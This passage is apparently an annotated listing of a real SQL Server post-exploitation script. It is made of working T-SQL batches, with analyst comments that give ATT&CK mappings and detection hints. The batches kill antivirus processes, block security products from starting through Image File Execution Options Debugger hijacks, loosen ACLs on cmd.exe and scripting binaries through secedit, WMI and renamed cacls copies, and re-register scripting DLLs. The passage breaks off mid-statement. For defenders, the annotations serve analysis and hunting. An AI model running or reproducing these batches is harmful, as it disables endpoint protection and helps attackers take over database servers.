  334. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'TypeLib\{F935DC20-1CF0-11D0-ADB9-00C04FD58A0B}\1.0\HELPDIR', N'', REG_SZ, N'C:\WINDOWS\system32\';DROP PROCEDURE sp_password  declare @a varchar(8000);EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\', N'', REG_SZ, N'FileSystem Object';
  335. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InProcServer32', N'', REG_SZ, N'C:\WINDOWS\system32\scrrun.dll';
  336. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\ProgID', N'', REG_SZ, N'Scripting.FileSystemObject';
  337. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\TypeLib', N'', REG_SZ, N'{420B2830-E718-11CF-893D-00A0C9054228}';
  338. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\Version', N'', REG_SZ, N'1.0';
  339. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}\', N'', REG_SZ, N'XML HTTP Request';
  340. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}\InProcServer32', N'', REG_SZ, N'C:\WINDOWS\system32\msxml3.dll';
  341. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}\ProgID', N'', REG_SZ, N'Microsoft.XMLHTTP.1.0';
  342. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}\TypeLib', N'', REG_SZ, N'{D63E0CE2-A0A2-11D0-9C02-00C04FC99C8E}';
  343. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{ED8C108E-4349-11D2-91A4-00C04F7969E8}\VersionIndependentProgID', N'', REG_SZ, N'Microsoft.XMLHTTP';DROP PROCEDURE sp_password    
  344. go
  -- The Jet provider registration is written once more, one statement per batch, so that a
  -- failure in one write does not abort the others.
  345. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{dee35070-506b-11cf-b1aa-00aa00b8de95}\ExtendedErrors\{dee35071-506b-11cf-b1aa-00aa00b8de95}', N'', REG_SZ, N'Microsoft Jet 4.0 OLE DB ProviderError Lookup'
  346. GO
  347. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{dee35070-506b-11cf-b1aa-00aa00b8de95}\InprocServer32', N'', REG_SZ, N'C:\WINDOWS\system32\msjetoledb40.dll'
  348. GO
  349. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{dee35070-506b-11cf-b1aa-00aa00b8de95}\OLE DB Provider', N'', REG_SZ, N'Microsoft Jet 4.0 OLE DB Provider'
  350. GO
  351. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{dee35070-506b-11cf-b1aa-00aa00b8de95}\ProgID', N'', REG_SZ, N'Microsoft.Jet.OLEDB.4.0'
  352. GO
  353. EXEC xp_regwrite N'HKEY_CLASSES_ROOT', N'CLSID\{dee35070-506b-11cf-b1aa-00aa00b8de95}\VersionIndependentProgID', N'', REG_SZ, N'Microsoft.Jet.OLEDB'
  354. GO
  355. EXEC xp_regwrite N'HKEY_LOCAL_MACHINE', N'SOFTWARE\Classes\CLSID\{dee35070-506b-11cf-b1aa-00aa00b8de95}\ExtendedErrors\{dee35071-506b-11cf-b1aa-00aa00b8de95}', N'', REG_SZ, N'Microsoft Jet 4.0 OLE DB ProviderError Lookup';
  356. GO
  -- Part 7: tampering with endpoint security software (MITRE ATT&CK T1562.001, Impair
  -- Defenses: Disable or Modify Tools).
  -- The first seven batches start cmd.exe through wscript.shell to terminate named security
  -- processes, first with 'taskkill /im <name> /f' and then with 'ntsd -c q -pn <name>'.
  -- Detection: cmd.exe, taskkill.exe or ntsd.exe launched with the SQL Server service as
  -- ancestor; unexpected termination events for the endpoint agent.
  357. declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
  358. @shell,'run',null,'c:\windows\system32\cmd.exe /c taskkill /im 360rp.exe /f'
  359. go
  360. declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
  361. @shell,'run',null,'c:\windows\system32\cmd.exe /c taskkill /im 360sd.exe /f'
  362. go
  363. declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
  364. @shell,'run',null,'c:\windows\system32\cmd.exe /c taskkill /im 360rps.exe /f'
  365. go
  366. declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
  367. @shell,'run',null,'c:\windows\system32\cmd.exe /c taskkill /im 360tray.exe /f'
  368. go
  369. declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
  370. @shell,'run',null,'c:\windows\system32\cmd.exe /c ntsd -c q -pn 360rp.exe'
  371. go
  372. declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
  373. @shell,'run',null,'c:\windows\system32\cmd.exe /c ntsd -c q -pn 360sd.exe'
  374. go
  375. declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
  376. @shell,'run',null,'c:\windows\system32\cmd.exe /c ntsd -c q -pn 360rps.exe'
  377. go
  -- The remaining lines set an 'Image File Execution Options\<image>\Debugger' value of
  -- 'taskkill.exe' for a list of security-product executables. With a Debugger value present,
  -- Windows starts the named debugger instead of the image, so each listed product would
  -- fail to launch (technique: T1546.012, IFEO injection).
  -- Detection and recovery: alert on any new IFEO 'Debugger' value, especially for security
  -- tooling; during clean-up, enumerate IFEO subkeys and remove Debugger values that point
  -- at taskkill.exe before restarting the affected agents.
  378. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rp.exe','Debugger','REG_SZ','taskkill.exe'
  379. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rps.exe','Debugger','REG_SZ','taskkill.exe'
  380. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe','Debugger','REG_SZ','taskkill.exe'
  381. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360sd.exe','Debugger','REG_SZ','taskkill.exe'
  382. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe','Debugger','REG_SZ','taskkill.exe'
  383. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Storm.exe','Debugger','REG_SZ','taskkill.exe'
  384. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravmond.exe','Debugger','REG_SZ','taskkill.exe'
  385. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Kwatch.exe','Debugger','REG_SZ','taskkill.exe'
  386. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kissvc.exe','Debugger','REG_SZ','taskkill.exe'
  387. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kavstart.exe','Debugger','REG_SZ','taskkill.exe'
  388. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avcenter.exe','Debugger','REG_SZ','taskkill.exe'
  389. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgnt.exe','Debugger','REG_SZ','taskkill.exe'
  390. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avguard.exe','Debugger','REG_SZ','taskkill.exe'
  391. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KsafeTray.exe','Debugger','REG_SZ','taskkill.exe'
  392. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KSWebShield.exe','Debugger','REG_SZ','taskkill.exe'
  393. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfp.exe','Debugger','REG_SZ','taskkill.exe'
  394. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmdagent.exe','Debugger','REG_SZ','taskkill.exe'
  395. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQPCRTP.EXE','Debugger','REG_SZ','taskkill.exe'
  396. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQPCTray.exe','Debugger','REG_SZ','taskkill.exe'
  397. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RSTRAY.EXE','Debugger','REG_SZ','taskkill.exe'
  398. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVSrvXp.exe','Debugger','REG_SZ','taskkill.exe'
  399. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.exe','Debugger','REG_SZ','taskkill.exe'
  400. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvxp.kxp','Debugger','REG_SZ','taskkill.exe'
  401. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SHSTAT.EXE','Debugger','REG_SZ','taskkill.exe'
  402. EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.kxp','Debugger','REG_SZ','taskkill.exe'
  403.  
  404. GO
  405.  
  -- Part 8: a security-template INF is written line by line with Scripting.FileSystemObject
  -- (createtextfile, overwrite = 1). The [File Security] section carries SDDL strings for
  -- cmd.exe, wscript.exe, cscript.exe and msado15.dll:
  --   D:P           protected DACL
  --   (A;;GRGX;;;BU) / (A;;GRGX;;;PU)   read+execute for Users / Power Users
  --   (A;;GA;;;BA)  / (A;;GA;;;SY)      full access for Administrators / SYSTEM
  -- i.e. it re-grants access to tools whose ACLs an administrator may have tightened.
  -- Later batches in this listing apply an INF of this name with 'secedit /configure'.
  -- The file name is relative, so it is created in the process's current directory; the
  -- text-stream handle @f is not closed within this batch.
  -- Detection: .inf files created by the SQL Server service, and ACL changes on these binaries.
  406. declare @o int, @f int, @t int, @ret int
  407. exec sp_oacreate 'scripting.filesystemobject', @o out
  408. exec sp_oamethod @o, 'createtextfile', @f out, 'fuckgothin.inf', 1
  409. exec @ret = sp_oamethod @f, 'writeline', NULL,'[Version]'
  410. exec @ret = sp_oamethod @f, 'writeline', NULL,'signature="$CHICAGO$"'
  411. exec @ret = sp_oamethod @f, 'writeline', NULL,'[File Security]'
  412. exec @ret = sp_oamethod @f, 'writeline', NULL,'1="c:\windows\system32\cmd.exe", 2, "D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)"'
  413. exec @ret = sp_oamethod @f, 'writeline', NULL,'1="c:\windows\system32\wscript.exe", 2, "D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)"'
  414. exec @ret = sp_oamethod @f, 'writeline', NULL,'1="c:\windows\system32\cscript.exe", 2, "D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)"'
  415. exec @ret = sp_oamethod @f, 'writeline', NULL,'1="C:\Program Files\Common Files\System\ado\msado15.dll", 2, "D:P(A;;GRGX;;;BU)(A;;GRGX;;;PU)(A;;GA;;;BA)(A;;GA;;;SY)"';
  416. GO
  417. DECLARE @ObjectToken INT;EXEC sp_OACreate '{00000566-0000-0010-8000-00AA006D2EA4}', @ObjectToken OUTPUT;EXEC sp_OASetProperty @ObjectToken, 'Type', 1;EXEC sp_OAMethod @ObjectToken, 'Open';EXEC sp_OAMethod @ObjectToken, 'Write', NULL, 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sp_OAMethod @ObjectToken, 'SaveToFile', NULL, 'FuckGOthin.inf', 2;EXEC sp_OAMethod @ObjectToken, 'Close';EXEC sp_OADestroy @ObjectToken;
  418. GO
  -- Applies the security template FuckGOthin.inf with 'secedit /configure', launched through
  -- a COM object created by CLSID. The first CLSID is the one this listing registers against
  -- wshom.ocx. NOTE(review): the second CLSID looks like Shell.Application, which is not
  -- known to expose a 'run' method - that batch may simply fail; confirm.
  -- Detection: secedit.exe started with /configure and a .cfg outside an admin change window;
  -- a new secedit.sdb next to the INF file.
  419. DECLARE @shell INT EXEC SP_OAcreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'secedit /configure /db secedit.sdb /cfg FuckGOthin.inf';
  420. GO
  421. DECLARE @shell INT EXEC SP_OAcreate '{13709620-C279-11CE-A49E-444553540000}',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'secedit /configure /db secedit.sdb /cfg FuckGOthin.inf';
  422. go
  -- The next three batches unregister (/u) and then re-register a set of scripting and ADO
  -- DLLs silently (/s), via both the Jet shell() path (database svch0st.xml) and wscript.shell.
  -- Indicator: regsvr32.exe is invoked from c:\windows\system32\config\, which is not where
  -- Windows ships that binary - a regsvr32.exe at that path deserves inspection.
  423. declare @a varchar(8000);select * from openrowset('microsoft.jet.oledb.4.0',';database=svch0st.xml','select shell("cmd /c c:\windows\system32\config\regsvr32.exe scrrun.dll wshom.ocx urlmon.dll shdocvw.dll jscript.dll vbscript.dll msvcp71.dll msadox.dll /s /u")');
  424. --sp_password
  425. go
  426. declare @shell002 int exec sp_oacreate 'wscript.shell',@shell002 output exec sp_oamethod @shell002,'run',null,'c:\windows\system32\config\regsvr32.exe scrrun.dll wshom.ocx urlmon.dll shdocvw.dll jscript.dll vbscript.dll msvcp71.dll msadox.dll /s','0','true';
  427. --sp_password
  428. go
  429. declare @a varchar(8000);select * from openrowset('microsoft.jet.oledb.4.0',';database=svch0st.xml','select shell("cmd /c c:\windows\system32\config\regsvr32.exe scrrun.dll wshom.ocx urlmon.dll shdocvw.dll jscript.dll vbscript.dll msvcp71.dll msadox.dll /s")');
  430. --sp_password
  431. go
  -- Part 9: file ACL changes through WMI, driven from T-SQL. Each of the four batches is the
  -- same sequence with a different target (wscript.exe, cacls.exe, cmd.exe, regini.exe):
  --   1. create WbemScripting.SWbemLocator.1 and connect to the local root\cimv2 namespace,
  --   2. fetch the Win32_LogicalFileSecuritySetting instance for the target path,
  --   3. fetch a Win32_SecurityDescriptor object and set its ControlFlags to 4,
  --   4. call SetSecurityDescriptor on the file with that descriptor and select the result.
  -- NOTE(review): ControlFlags 4 corresponds to SE_DACL_PRESENT; since no DACL is assigned
  -- to the descriptor in these batches, the result would presumably be a NULL DACL, i.e. no
  -- access restriction on the file - confirm on a test host. The paths are bare file names,
  -- so whether WMI resolves them is also unverified.
  -- Detection: WMI activity originating from the SQL Server service, and DACL changes on
  -- system binaries (file-system auditing on these executables).
  432. DECLARE @objLocator int,@objWmi int,@objPermiss int,@objFull int,@objRet int;
  433. EXEC sp_OACreate 'WbemScripting.SWbemLocator.1',@objLocator OUTPUT;
  434. EXEC sp_OAMethod @objLocator,'ConnectServer',@objWmi OUTPUT,'.','root\cimv2';
  435. EXEC sp_OAMethod @objWmi,'Get',@objPermiss OUTPUT,'Win32_LogicalFileSecuritySetting.Path=''wscript.exe''';
  436. EXEC sp_OAMethod @objWmi,'Get',@objFull OUTPUT,'Win32_SecurityDescriptor';
  437. EXEC sp_OASetProperty @objFull,'ControlFlags',4;
  438. EXEC sp_OAMethod @objPermiss,'SetSecurityDescriptor',@objRet output,@objFull;SELECT @objRet
  439. go
  440. DECLARE @objLocator int,@objWmi int,@objPermiss int,@objFull int,@objRet int;
  441. EXEC sp_OACreate 'WbemScripting.SWbemLocator.1',@objLocator OUTPUT;
  442. EXEC sp_OAMethod @objLocator,'ConnectServer',@objWmi OUTPUT,'.','root\cimv2';
  443. EXEC sp_OAMethod @objWmi,'Get',@objPermiss OUTPUT,'Win32_LogicalFileSecuritySetting.Path=''cacls.exe''';
  444. EXEC sp_OAMethod @objWmi,'Get',@objFull OUTPUT,'Win32_SecurityDescriptor';
  445. EXEC sp_OASetProperty @objFull,'ControlFlags',4;
  446. EXEC sp_OAMethod @objPermiss,'SetSecurityDescriptor',@objRet output,@objFull;SELECT @objRet
  447. go
  448. DECLARE @objLocator int,@objWmi int,@objPermiss int,@objFull int,@objRet int;
  449. EXEC sp_OACreate 'WbemScripting.SWbemLocator.1',@objLocator OUTPUT;
  450. EXEC sp_OAMethod @objLocator,'ConnectServer',@objWmi OUTPUT,'.','root\cimv2';
  451. EXEC sp_OAMethod @objWmi,'Get',@objPermiss OUTPUT,'Win32_LogicalFileSecuritySetting.Path=''cmd.exe''';
  452. EXEC sp_OAMethod @objWmi,'Get',@objFull OUTPUT,'Win32_SecurityDescriptor';
  453. EXEC sp_OASetProperty @objFull,'ControlFlags',4;
  454. EXEC sp_OAMethod @objPermiss,'SetSecurityDescriptor',@objRet output,@objFull;SELECT @objRet
  455. go
  456. DECLARE @objLocator int,@objWmi int,@objPermiss int,@objFull int,@objRet int;
  457. EXEC sp_OACreate 'WbemScripting.SWbemLocator.1',@objLocator OUTPUT;
  458. EXEC sp_OAMethod @objLocator,'ConnectServer',@objWmi OUTPUT,'.','root\cimv2';
  459. EXEC sp_OAMethod @objWmi,'Get',@objPermiss OUTPUT,'Win32_LogicalFileSecuritySetting.Path=''regini.exe''';
  460. EXEC sp_OAMethod @objWmi,'Get',@objFull OUTPUT,'Win32_SecurityDescriptor';
  461. EXEC sp_OASetProperty @objFull,'ControlFlags',4;
  462. EXEC sp_OAMethod @objPermiss,'SetSecurityDescriptor',@objRet output,@objFull;SELECT @objRet
  463. go
  -- Analyst note: single-line batch. It creates three COM objects by the CLSID
  -- {72C24DD5-D70A-438B-8A42-98424B88AFB8} (the value this paste writes under
  -- WScript.Shell\CLSID in a later batch) and calls 'run' on them with cacls.exe command lines.
  -- Every command has the form "<file> /e /t /g system:F", i.e. edit the existing ACL and grant
  -- the SYSTEM account full control, for cmd.exe, wscript.exe, cscript.exe, ftp.exe, regini.exe,
  -- reg.exe, taskkill.EXE, wbemdisp.tlb, msado15.dll (listed twice) and ias\ias.mdb.
  -- The four batches after this one repeat the argument list with a different program in the
  -- cacls.exe position: C:\WINDOWS\help\akpls.exe, c:\windows\system32\wbem\vice.exe,
  -- C:\WINDOWS\inf\wmis.inf and C:\Windows\System32\60hack.exe -- presumably renamed copies of
  -- cacls.exe; confirm by hash.
  -- Hunting: those four paths on disk, and child processes of the SQL Server service whose
  -- command line ends in "/e /t /g system:F".
  464. declare @passwordcmdcov INT;declare @passwordcmdcov1 INT;declare @passwordftpcov INT;exec sp_OACreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@passwordcmdcov output;exec sp_OACreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@passwordcmdcov1 output;exec sp_OACreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@passwordftpcov output;exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\system32\cacls.exe %SystemRoot%\system32\cmd.exe /e /t /g system:F';exec sp_OAMethod @passwordcmdcov,'run',null,'C:\WINDOWS\system32\cacls.exe %SystemRoot%\system32\wscript.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\system32\cacls.exe cscript.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\system32\cacls.exe ftp.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\system32\cacls.exe regini.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\system32\cacls.exe reg.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\system32\cacls.exe taskkill.EXE /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\system32\cacls.exe wbemdisp.tlb /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\system32\cacls.exe C:\Progra~1\Common~1\System\ado\msado15.dll /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\system32\cacls.exe C:\Progra~1\Common~1\System\ado\msado15.dll /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\system32\cacls.exe C:\WINDOWS\system32\ias\ias.mdb /e /t /g system:F';
  465. go
  466. declare @passwordcmdcov INT;declare @passwordcmdcov1 INT;declare @passwordftpcov INT;exec sp_OACreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@passwordcmdcov output;exec sp_OACreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@passwordcmdcov1 output;exec sp_OACreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@passwordftpcov output;exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\help\akpls.exe %SystemRoot%\system32\cmd.exe /e /t /g system:F';exec sp_OAMethod @passwordcmdcov,'run',null,'C:\WINDOWS\help\akpls.exe %SystemRoot%\system32\wscript.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\help\akpls.exe cscript.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\help\akpls.exe ftp.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\help\akpls.exe regini.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\help\akpls.exe reg.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\help\akpls.exe taskkill.EXE /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\help\akpls.exe wbemdisp.tlb /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\help\akpls.exe C:\Progra~1\Common~1\System\ado\msado15.dll /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\help\akpls.exe C:\Progra~1\Common~1\System\ado\msado15.dll /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\help\akpls.exe C:\WINDOWS\system32\ias\ias.mdb /e /t /g system:F';
  467. go
  468. declare @passwordcmdcov INT;declare @passwordcmdcov1 INT;declare @passwordftpcov INT;exec sp_OACreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@passwordcmdcov output;exec sp_OACreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@passwordcmdcov1 output;exec sp_OACreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@passwordftpcov output;exec sp_OAMethod @passwordftpcov,'run',null,'c:\windows\system32\wbem\vice.exe %SystemRoot%\system32\cmd.exe /e /t /g system:F';exec sp_OAMethod @passwordcmdcov,'run',null,'c:\windows\system32\wbem\vice.exe %SystemRoot%\system32\wscript.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'c:\windows\system32\wbem\vice.exe cscript.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'c:\windows\system32\wbem\vice.exe ftp.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'c:\windows\system32\wbem\vice.exe regini.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'c:\windows\system32\wbem\vice.exe reg.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'c:\windows\system32\wbem\vice.exe taskkill.EXE /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'c:\windows\system32\wbem\vice.exe wbemdisp.tlb /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'c:\windows\system32\wbem\vice.exe C:\Progra~1\Common~1\System\ado\msado15.dll /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'c:\windows\system32\wbem\vice.exe C:\Progra~1\Common~1\System\ado\msado15.dll /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'c:\windows\system32\wbem\vice.exe C:\WINDOWS\system32\ias\ias.mdb /e /t /g system:F';
  469. go
  470. declare @passwordcmdcov INT;declare @passwordcmdcov1 INT;declare @passwordftpcov INT;exec sp_OACreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@passwordcmdcov output;exec sp_OACreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@passwordcmdcov1 output;exec sp_OACreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@passwordftpcov output;exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\inf\wmis.inf %SystemRoot%\system32\cmd.exe /e /t /g system:F';exec sp_OAMethod @passwordcmdcov,'run',null,'C:\WINDOWS\inf\wmis.inf %SystemRoot%\system32\wscript.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\inf\wmis.inf cscript.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\inf\wmis.inf ftp.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\inf\wmis.inf regini.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\inf\wmis.inf reg.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\inf\wmis.inf taskkill.EXE /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\inf\wmis.inf wbemdisp.tlb /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\inf\wmis.inf C:\Progra~1\Common~1\System\ado\msado15.dll /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\inf\wmis.inf C:\Progra~1\Common~1\System\ado\msado15.dll /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\inf\wmis.inf C:\WINDOWS\system32\ias\ias.mdb /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\WINDOWS\inf\wmis.inf cacls.exe /e /t /g system:F';
  471. go
  472. declare @passwordcmdcov INT;declare @passwordcmdcov1 INT;declare @passwordftpcov INT;exec sp_OACreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@passwordcmdcov output;exec sp_OACreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@passwordcmdcov1 output;exec sp_OACreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@passwordftpcov output;exec sp_OAMethod @passwordftpcov,'run',null,'C:\Windows\System32\60hack.exe %SystemRoot%\system32\cmd.exe /e /t /g system:F';exec sp_OAMethod @passwordcmdcov,'run',null,'C:\Windows\System32\60hack.exe %SystemRoot%\system32\wscript.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\Windows\System32\60hack.exe cscript.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\Windows\System32\60hack.exe ftp.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\Windows\System32\60hack.exe regini.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\Windows\System32\60hack.exe reg.exe /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\Windows\System32\60hack.exe taskkill.EXE /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\Windows\System32\60hack.exe wbemdisp.tlb /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\Windows\System32\60hack.exe C:\Progra~1\Common~1\System\ado\msado15.dll /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'C:\Windows\System32\60hack.exe C:\Progra~1\Common~1\System\ado\msado15.dll /e /t /g system:F';exec sp_OAMethod 